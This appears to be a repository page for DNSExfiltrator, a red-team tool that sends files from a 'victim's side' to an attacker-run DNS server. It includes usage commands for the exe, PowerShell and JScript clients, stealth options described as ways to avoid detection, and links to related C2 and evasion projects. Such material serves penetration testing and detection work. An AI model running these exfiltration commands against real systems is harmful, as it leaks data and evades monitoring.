• Stars
    star
    802
  • Rank 56,815 (Top 2 %)
  • Language
    JavaScript
  • Created almost 7 years ago
  • Updated about 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Data exfiltration over DNS request covert channel

DNSExfiltrator

Author: Arno0x0x - @Arno0x0x

DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.

DNSExfiltrator has two sides:

  1. The server side, coming as a single python script (dnsexfiltrator.py), which acts as a custom DNS server, receiving the file
  2. The client side (victim's side), which comes in three flavors:
  • dnsExfiltrator.cs: a C# script that can be compiled with csc.exe to provide a Windows managed executable
  • Invoke-DNSExfiltrator.ps1: a PowerShell script providing the exact same functionnalities by wrapping the dnsExfiltrator assembly
  • dnsExfiltrator.js: a JScript script which is a conversion of the dnsExiltrator DLL assembly using DotNetToJScript, and providing the exact same functionnalities

In order for the whole thing to work you must own a domain name and set the DNS record (NS) for that domain to point to the server that will run the dnsexfiltrator.py server side.

Features

By default, DNSExfiltrator uses the system's defined DNS server, but you can also set a specific one to use (useful for debugging purposes or for running the server side locally for instance).

Alternatively, using the h parameter, DNSExfiltrator can perform DoH (DNS over HTTP) using the Google or CloudFlare DoH servers.

By default, the data to be exfiltrated is base64URL encoded in order to fit into DNS requests. However some DNS resolvers might break this encoding (fair enough since FQDN are not supposed to case sensitve anyway) by messing up with the sensitivity of the case (upper or lower case) which is obviously important for the encoding/decoding process. To circumvent this problem you can use the -b32 flag in order to force Base32 encoding of the data, which comes with a little size overhead. If you're using CloudFlare DoH, base32 encoding is automatically applied.

DNSExfiltrator supports basic RC4 encryption of the exfiltrated data, using the provided password to encrypt/decrypt the data.

DNSExfiltrator also provides some optional features to avoid detection:

  • requests throttling in order to stay more stealthy when exfiltrating data
  • reduction of the DNS request size (by default it will try to use as much bytes left available in each DNS request for efficiency)
  • reduction of the DNS label size (by default it will try to use the longest supported label size of 63 chars)

Dependencies

The only dependency is on the server side, as the dnsexfiltrator.py script relies on the external dnslib library. You can install it using pip:

pip install -r requirements.txt

Usage

SERVER SIDE

Start the dnsexfiltrator.py script passing it the domain name and decryption password to be used:

root@kali:~# ./dnsexfiltrator.py -d mydomain.com -p password

CLIENT SIDE

You can either use the compiled version, or the PowerShell wrapper (which is basically the same thing) or the JScript wrapper. In any case, the parameters are the same, with just a slight difference in the way of passing them in PowerShell.

1/ Using the C# compiled Windows executable (which you can find in the release directory):

dnsExfiltrator.exe <file> <domainName> <password> [-b32] [h=google|cloudflare] [s=<DNS_server>] [t=<throttleTime>] [r=<requestMaxSize>] [l=<labelMaxSize>]
      file:           [MANDATORY] The file name to the file to be exfiltrated.
      domainName:     [MANDATORY] The domain name to use for DNS requests.
      password:       [MANDATORY] Password used to encrypt the data to be exfiltrated.
      -b32:           [OPTIONNAL] Use base32 encoding of data. Might be required by some DNS resolver break case.
      h:              [OPTIONNAL] Use Google or CloudFlare DoH (DNS over HTTP) servers.
      DNS_Server:     [OPTIONNAL] The DNS server name or IP to use for DNS requests. Defaults to the system one.
      throttleTime:   [OPTIONNAL] The time in milliseconds to wait between each DNS request.
      requestMaxSize: [OPTIONNAL] The maximum size in bytes for each DNS request. Defaults to 255 bytes..
      labelMaxSize:   [OPTIONNAL] The maximum size in chars for each DNS request label (subdomain). Defaults to 63 chars.

2/ Using the PowerShell script, well, call it in any of your prefered way (you probably know tons of ways of invoking a powershell script) along with the script parameters. Most basic example:

c:\DNSExfiltrator> powershell
PS c:\DNSExfiltrator> Import-Module .\Invoke-DNSExfiltrator.ps1
PS c:\DNSExfiltrator> Invoke-DNSExfiltrator -i inputFile -d mydomain.com -p password -s my.dns.server.com -t 500
[...]

Check the EXAMPLES section in the script file for further usage examples.

3/ Using the JScript script, pass it the exact same arguments as you would with the standalone Windows executable:

cscript.exe dnsExiltrator.js inputFile mydomain.com password

Or, with some options:

cscript.exe dnsExiltrator.js inputFile mydomain.com password s=my.dns.server.com t=500

TODO

  • Some will ask for AES encryption instead of RC4, I know... might add it later
  • Display estimated transfer time
  • Do better argument parsing (I'm too lazy to learn how to use a c# argument parsing library, I wish it was as simple as Python)

DISCLAIMER

This tool is intended to be used in a legal and legitimate way only:

  • either on your own systems as a means of learning, of demonstrating what can be done and how, or testing your defense and detection mechanisms
  • on systems you've been officially and legitimately entitled to perform some security assessments (pentest, security audits)

Quoting Empire's authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.

More Repositories

1

EmbedInHTML

Embed and hide any file in an HTML file
HTML
462
star
2

PowerShellScripts

Collection of PowerShell scripts
PowerShell
434
star
3

ShellcodeWrapper

Shellcode wrapper with encryption for multiple target languages
Python
410
star
4

WSC2

A WebSocket C2 Tool
Python
366
star
5

CSharpScripts

Collection of C# scripts
C#
326
star
6

NtlmRelayToEWS

ntlm relay attack to Exchange Web Services
Python
325
star
7

DivertTCPconn

A TCP packet diverter for Windows platform
C
275
star
8

DBC2

DBC2 (DropboxC2) is a modular post-exploitation tool, composed of an agent running on the victim's machine, a controler, running on any machine, powershell modules, and Dropbox servers as a means of communication.
PowerShell
269
star
9

DNSDelivery

DNSDelivery provides delivery and in memory execution of shellcode or .Net assembly using DNS requests delivery channel.
PowerShell
148
star
10

TwoFactorAuth

Two Factor Authentication web portal written in PHP
PHP
119
star
11

TCPRelayInjecter

Tool for injecting a "TCP Relay" managed assembly into unmanaged processes
C++
119
star
12

WebDavC2

A WebDAV PROPFIND C2 tool
Python
116
star
13

ObfuscateCactusTorch

When CactusTorch meets WebDavDelivery and obfuscation
Python
64
star
14

TCPRelayInjecter2

Tool for injecting a "TCP Relay" managed assembly into an unmanaged process
C#
62
star
15

ReflectiveDnsExfiltrator

Data exfiltration using reflective DNS resolution covert channel
JavaScript
54
star
16

WebDavDelivery

A WebDAV PROPFIND covert channel to deliver payloads
Visual Basic
53
star
17

TermGate

A web application for running shell commands interactively on your server
PHP
21
star
18

BluecoatURLFilteringBypass

Bluecoat proxies URL filtering bypass PoC
JavaScript
14
star
19

MOBACMapsSources

Mobile Atlas Creator Additionnal map sources
11
star
20

NmapScripts

Collection of Nmap scripts
Lua
11
star
21

MultibyteEncodedShellcode

An AV evasion technique using multibyte xor encoding of shellcode
9
star
22

Docker-Dnscat2

Dockerfile and ressources for Dnscat2
Shell
8
star
23

GimmeTheFile

Proof of concept for bypassing corporate web proxies filtering and antiviruses
PHP
8
star
24

DeliverXLLviaHTML

Deliver encrypted XLL embeded in HTML file
7
star
25

Docker-Socator

Dockerfile and ressources for Socat + Tor
Shell
7
star
26

ShellScripts

Collection of shell scripts
Shell
6
star
27

HttpProxy

A simple HttpProxy for NodeJS
JavaScript
6
star
28

Docker-Cryptpad

Dockerfile and ressources for CryptPad application
JavaScript
5
star
29

Docker-DBC2

Dockerfile and ressources for DBC2
1
star
30

Docker-Koadic

Dockerfile and ressources for Koadic
1
star